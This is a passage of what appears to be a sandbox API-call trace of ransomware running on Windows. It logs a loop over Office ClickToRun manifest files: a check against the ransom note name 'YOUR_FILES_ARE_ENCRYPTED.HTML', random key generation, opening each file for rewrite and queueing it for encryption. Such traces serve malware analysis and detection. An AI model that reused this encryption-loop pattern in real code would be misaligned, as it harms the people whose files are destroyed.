2 
[0156.192] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="81") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="38") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="BD") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AA") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="32") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="78") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="8A") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="CE") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B6") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4A") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="81") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="52") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A1") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E6") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="5F") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="BA") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="65") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="AA") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="FC") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="1F") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="BB") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: 
param_1="9C") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="98") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2D") returned 2 [0156.193] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" [0156.193] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.194] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.194] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dfd4f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dfd4f0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77df3bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x4a1a, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.onenotemui.msi.16.en-us.xml", cAlternateFileName="C24C3D~1.XML")) returned 1 [0156.194] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml") returned 118 [0156.194] lstrcmpW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.194] PathFindExtensionW 
(pszPath="C2RManifest.onenotemui.msi.16.en-us.xml") returned=".xml" [0156.194] lstrlenW (lpString=".xml") returned 4 [0156.194] PathFindExtensionW (pszPath="C2RManifest.onenotemui.msi.16.en-us.xml") returned=".xml" [0156.194] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.194] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.194] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=18970) returned 1 [0156.194] GetProcessHeap () returned 0x270000 [0156.194] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0156.198] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="16") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="93") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D1") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="72") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="FB") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="C5") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F1") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="46") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="78") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="5C") returned 2 [0156.198] wsprintfW 
(in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="98") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8C") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="65") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="60") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B0") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="FC") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="D4") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A0") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="17") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="7C") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="54") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="82") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="CC") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F2") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="E4") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A1") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="43") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A6") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="46") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="09") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="0E") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0B") 
returned 2 [0156.199] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" [0156.199] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.199] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0156.199] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7759eef0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", cAlternateFileName="C24EFF~1.XML")) returned 1 [0156.199] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned 123 [0156.200] lstrcmpW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.200] PathFindExtensionW (pszPath="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned=".xml" [0156.200] lstrlenW (lpString=".xml") returned 4 [0156.200] PathFindExtensionW (pszPath="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned=".xml" 
[0156.200] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.200] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0156.201] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=1518) returned 1 [0156.201] GetProcessHeap () returned 0x270000 [0156.201] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0156.204] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="56") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3A") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="CA") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="39") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="ED") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="0F") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="9F") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C6") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D5") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DF") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C7") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CF") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda66, 
param_2="%02X" | out: param_1="54") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="A9") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="45") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="AA") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="29") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="5C") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="57") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="DA") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="36") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="10") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="07") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="6B") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="EB") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="76") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="7F") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="DE") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="85") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="33") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="33") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="59") returned 2 [0156.206] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" | out: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" [0156.206] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.206] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0156.206] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77e8c170, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2b14, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.osmmui.msi.16.en-us.xml", cAlternateFileName="C25F09~1.XML")) returned 1 [0156.206] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml") returned 114 [0156.206] lstrcmpW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.206] PathFindExtensionW (pszPath="C2RManifest.osmmui.msi.16.en-us.xml") returned=".xml" [0156.206] lstrlenW (lpString=".xml") returned 4 [0156.206] PathFindExtensionW (pszPath="C2RManifest.osmmui.msi.16.en-us.xml") returned=".xml" [0156.206] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.206] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.206] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=11028) returned 1 [0156.206] GetProcessHeap () returned 0x270000 [0156.206] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74ea160 [0156.210] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="57") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="15") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D7") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="DA") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DD") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EA") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="CB") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="77") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8C") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="52") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C7") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3C") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F0") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FF") returned 2 [0156.210] wsprintfW (in: 
param_1=0x4ebda6e, param_2="%02X" | out: param_1="11") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="47") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E3") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="57") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="3A") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="45") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="06") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="3B") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="AD") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C2") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="D3") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="F7") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="79") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E1") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6D") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="11") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="22") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="33") returned 2 [0156.211] lstrcpyW (in: lpString1=0x74fa214, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml") 
returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" [0156.211] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x74ea160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.211] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74ea160, lpOverlapped=0x74ea160) returned 1 [0156.211] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x775eb1b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x8fa, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", cAlternateFileName="C22C6F~1.XML")) returned 1 [0156.211] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned 127 [0156.211] lstrcmpW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.212] PathFindExtensionW (pszPath="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned=".xml" [0156.212] lstrlenW (lpString=".xml") returned 4 [0156.212] PathFindExtensionW (pszPath="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned=".xml" [0156.212] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.212] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: 
"c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0156.212] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=2298) returned 1 [0156.212] GetProcessHeap () returned 0x270000 [0156.212] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75122b8 [0156.216] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="37") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D8") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="AE") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5D") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="9E") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="04") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="3E") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="04") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B0") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="F0") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6A") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CD") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="B7") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="80") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="EC") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: 
param_1="47") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="80") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="2F") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="F6") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="27") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="4B") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="1F") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="40") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F4") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AE") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="85") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="47") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="AC") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="96") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="70") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="FB") returned 2 [0156.217] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="36") returned 2 [0156.217] lstrcpyW (in: lpString1=0x752236c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" 
